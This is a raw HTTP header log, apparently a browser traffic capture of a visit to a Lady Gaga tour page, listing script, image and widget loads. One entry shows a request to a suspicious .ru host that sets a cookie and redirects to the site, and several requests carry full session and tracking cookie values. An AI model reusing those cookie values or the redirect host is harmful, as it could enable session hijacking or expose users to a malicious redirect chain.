User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.0 200 OK

Content-Type: text/javascript
Content-Length: 575
Connection: keep-alive
x-amz-id-2: M4k1UcucxXZxfKfj29g5GuDBye12tx9mdbLzVRUoMhDuWLBBFWI9F1OG6rIUhnWd
x-amz-request-id: D13E98733E0C17F3
Date: Thu, 18 Oct 2012 21:40:12 GMT
Cache-Control: max-age=31557600
Content-Encoding: gzip
Last-Modified: Tue, 07 Aug 2012 22:20:23 GMT
Etag: &quot;a395389bb0d2ae17fd54ccf68a21da3b&quot;
Accept-Ranges: bytes
Server: AmazonS3
Age: 1545711
X-Amz-Cf-Id: hwPpbww_JgjNmhgLIAipM7bfCUbJYxPnl_mJf5rZ8miEuPhS4Bb2Ig==
Via: 1.0 1228e077cd8e3d045c8d3f88beaa5abd.cloudfront.net (CloudFront)
X-Cache: Hit from cloudfront
GET /c/938/cc_af.js HTTP/1.1

Host: tags.crwdcntrl.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Content-Encoding: gzip
Accept-Ranges: bytes
Cache-Control: max-age=86400
Date: Mon, 05 Nov 2012 19:02:02 GMT
Etag: &quot;abfe-4ca89beb97c80&quot;
Expires: Tue, 06 Nov 2012 19:02:02 GMT
Last-Modified: Tue, 25 Sep 2012 17:07:46 GMT
Server: ECS (arn/467E)
Vary: Accept-Encoding
X-Cache: HIT
X-Cnection: close
Content-Length: 10746
GET /web_assets/_global/js/echo/plugins/jquery.qtip.min.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Fri, 19 Aug 2011 17:26:25 GMT
Accept-Ranges: bytes
Etag: &quot;7191b1f955ecc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 14661
Vary: Accept-Encoding
Cache-Control: private, max-age=51122
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /web_assets/_global/js/echo/plugins/enhanced-metadata.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Thu, 23 Jun 2011 23:47:31 GMT
Accept-Ranges: bytes
Etag: &quot;d0cfddeaff31cc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 698
Vary: Accept-Encoding
Cache-Control: private, max-age=48248
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /bornthiswayball/images/monsterpit.jpg HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a01+PM
HTTP/1.1 200 OK

Content-Type: image/jpeg
Last-Modified: Thu, 16 Feb 2012 23:34:56 GMT
Accept-Ranges: bytes
Etag: &quot;090f1963edcc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 7777
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /web_assets/_global/js/echo/plugins/filter-children.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Fri, 06 May 2011 00:00:01 GMT
Accept-Ranges: bytes
Etag: &quot;1c3cde8b80bcc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 840
Vary: Accept-Encoding
Cache-Control: private, max-age=51360
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /web_assets/_global/js/echo/plugins/lmk-stream.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Fri, 06 May 2011 00:00:01 GMT
Accept-Ranges: bytes
Etag: &quot;8170e18b80bcc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 1964
Vary: Accept-Encoding
Cache-Control: private, max-age=16268
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /web_assets/_global/js/echo/plugins/permalink.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Fri, 06 May 2011 00:41:43 GMT
Accept-Ranges: bytes
Etag: &quot;a11cd55e86bcc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 449
Vary: Accept-Encoding
Cache-Control: private, max-age=16524
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /magicactionable.cgi?8 HTTP/1.1

Host: nullifiedfilebyfile.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
HTTP/1.1 302 Found

Content-Type: text/html
Server: nginx
Date: Mon, 05 Nov 2012 19:04:18 GMT
Connection: keep-alive
Set-Cookie: bzurh8=_0_; expires=Tue, 06-Nov-2012 19:04:18 GMT; path=/; domain=nullifiedfilebyfile.ru
Location: http://www.ladygaga.com
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 156
GET /web_assets/_global/js/echo/plugins/permalink-retag.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Fri, 06 May 2011 00:41:43 GMT
Accept-Ranges: bytes
Etag: &quot;9fb0d95e86bcc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 501
Vary: Accept-Encoding
Cache-Control: private, max-age=48364
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /web_assets/_global/js/echo/plugins/regex.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Fri, 06 May 2011 00:00:01 GMT
Accept-Ranges: bytes
Etag: &quot;3f40dc8b80bcc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 748
Vary: Accept-Encoding
Cache-Control: private, max-age=11836
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /translate_a/element.js?cb=googleTranslateElementInit HTTP/1.1

Host: translate.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Date: Mon, 05 Nov 2012 19:02:02 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Language: en
Pragma: no-cache
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: HTTP server (unknown)
Content-Length: 702
X-XSS-Protection: 1; mode=block
GET /web_assets/_global/js/echo/plugins/social-sharing.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Sat, 17 Sep 2011 06:20:02 GMT
Accept-Ranges: bytes
Etag: &quot;74abadd5175cc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 1978
Vary: Accept-Encoding
Cache-Control: private, max-age=48306
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /bornthiswayball/images/tourheader.png HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a01+PM
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Tue, 10 Apr 2012 21:44:28 GMT
Accept-Ranges: bytes
Etag: &quot;086a71a6317cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 1594
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /web_assets/_global/js/echo/plugins/sort-order.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Fri, 06 May 2011 00:00:02 GMT
Accept-Ranges: bytes
Etag: &quot;f8c57e8c80bcc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 884
Vary: Accept-Encoding
Cache-Control: private, max-age=12018
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /backplane.js HTTP/1.1

Host: d134l0cdryxgwa.cloudfront.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
If-Modified-Since: Fri, 02 Nov 2012 14:16:18 GMT
If-None-Match: W/&quot;15289-1351865778000&quot;
HTTP/1.0 304 Not Modified

HTTP/1.0 304 Not Modified
Connection: keep-alive
Date: Mon, 05 Nov 2012 19:02:02 GMT
Etag: W/&quot;15289-1351865778000&quot;
Last-Modified: Fri, 02 Nov 2012 14:16:18 GMT
Age: 81190
X-Amz-Cf-Id: xsrP4f7hIEDoZ9Sl5DpBvSn3Yfvi_jmv2r6N2W8unN1EPIlmCCb4Eg==
Via: 1.0 cacff3534bf6dc97c5efb0e2f25f6c15.cloudfront.net (CloudFront)
X-Cache: Hit from cloudfront
GET /web_assets/_global/js/echo/plugins/strip-html.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Tue, 26 Jun 2012 17:44:19 GMT
Accept-Ranges: bytes
Etag: &quot;10d98750c353cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 630
Vary: Accept-Encoding
Cache-Control: private, max-age=48412
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /bornthiswayball/ HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a01+PM
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 11344
Vary: Accept-Encoding
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
Set-Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a02+PM; path=/
GET /web_assets/_global/js/echo/plugins/switch-arktan-image.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 18:24:05 GMT
Accept-Ranges: bytes
Etag: &quot;d741b11982a5cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 1998
Vary: Accept-Encoding
Cache-Control: private, max-age=70602
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /_global/images/ucid/sso_social_icons.png HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a01+PM
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Thu, 15 Dec 2011 00:48:31 GMT
Accept-Ranges: bytes
Etag: &quot;8019d44c3bacc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 2517
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /_global/images/ucid/ajax-loader.gif HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a01+PM
HTTP/1.1 200 OK

Content-Type: image/gif
Last-Modified: Fri, 16 Sep 2011 01:05:18 GMT
Accept-Ranges: bytes
Etag: &quot;9bb075b3c74cc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 2892
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /web_assets/_global/js/echo/plugins/ucid-login.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Wed, 21 Dec 2011 02:59:15 GMT
Accept-Ranges: bytes
Etag: &quot;fd2779868cbfcc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 606
Vary: Accept-Encoding
Cache-Control: private, max-age=10496
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /web_assets/_global/js/echo/plugins/youtube-wmode.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Fri, 18 May 2012 18:06:06 GMT
Accept-Ranges: bytes
Etag: &quot;bace63e52035cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 476
Vary: Accept-Encoding
Cache-Control: private, max-age=47943
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /js/plusone.js HTTP/1.1

Host: apis.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: application/javascript; charset=utf-8
x-ua-compatible: IE=edge, chrome=1
Etag: &quot;c01ee70a9610e1752b0b8177e36acb90&quot;
Expires: Mon, 05 Nov 2012 19:02:02 GMT
Date: Mon, 05 Nov 2012 19:02:02 GMT
Cache-Control: private, max-age=1800
Content-Encoding: gzip
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
GET /widgets.js HTTP/1.1

Host: platform.twitter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript; charset=utf-8
Cache-Control: public, max-age=1800
Last-Modified: Fri, 02 Nov 2012 09:48:09 GMT
Etag: &quot;eeaccca8778f3be533564253af185e3e&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 24565
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
P3P: CP=&quot;CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT&quot;
GET /web_assets/_global/js/echo/echo_comment_localization.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Tue, 20 Dec 2011 21:59:26 GMT
Accept-Ranges: bytes
Etag: &quot;f6b820a462bfcc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 1273
Vary: Accept-Encoding
Cache-Control: private, max-age=81578
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /ark-metadata-css.js HTTP/1.1

Host: cdn.arktan.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.0 200 OK

Content-Type: text/javascript
Content-Length: 2043
Connection: keep-alive
x-amz-id-2: 21iRXBWRx3xSKzRgIQYgZy1FzMffUmZNngjrTbTroJqiEB7ItppujVx43O6T2QE+
x-amz-request-id: 8D2D342454AD1A65
Date: Sat, 06 Oct 2012 05:26:57 GMT
Last-Modified: Sun, 15 May 2011 17:00:19 GMT
Etag: &quot;5fb0eb8ade5b4c9e255c8dffae170d0f&quot;
Accept-Ranges: bytes
Server: AmazonS3
Age: 72304
X-Amz-Cf-Id: OdMuxyPcWtRcUuvh0GjSRpBvIkSP1JOxebF4flGB_h4tOC4DGd0Bvg==
Via: 1.0 eb6f649c4ef37d63b96c5ebdf67e9f39.cloudfront.net (CloudFront)
X-Cache: Hit from cloudfront
GET /libs/v1/forum/forum.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:38:36 GMT
Etag: 4854a743dcd20a348966ec8effb8a6d9
Vary: Accept-Encoding
X-Trans-Id: tx61e5784f90604396adf55e297645878d
X-Timestamp: 1349707116.51594
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Thu, 27 Sep 2012 19:27:22 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 1226
Cache-Control: public, max-age=304
Expires: Mon, 05 Nov 2012 19:07:06 GMT
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /libs/v1/comments/edit.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:39:56 GMT
Etag: 98a5cfe14f4210a1394cc96b00cc5847
Vary: Accept-Encoding
X-Timestamp: 1349707196.00669
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Fri, 29 Jul 2011 18:08:19 GMT
Accept-Ranges: bytes
X-Trans-Id: tx75e3792e2d8947d88a3b99e3e9ad5b3f
Content-Encoding: gzip
Content-Length: 1492
Cache-Control: public, max-age=326
Expires: Mon, 05 Nov 2012 19:07:28 GMT
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /libs/v1/UpdateSort/UpdateSort.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:36:09 GMT
Etag: c2574a22c6c05a03439a60553579ce5d
Vary: Accept-Encoding
X-Trans-Id: tx3113236d299e4c14aa856e32c42dfc89
X-Timestamp: 1349706969.20250
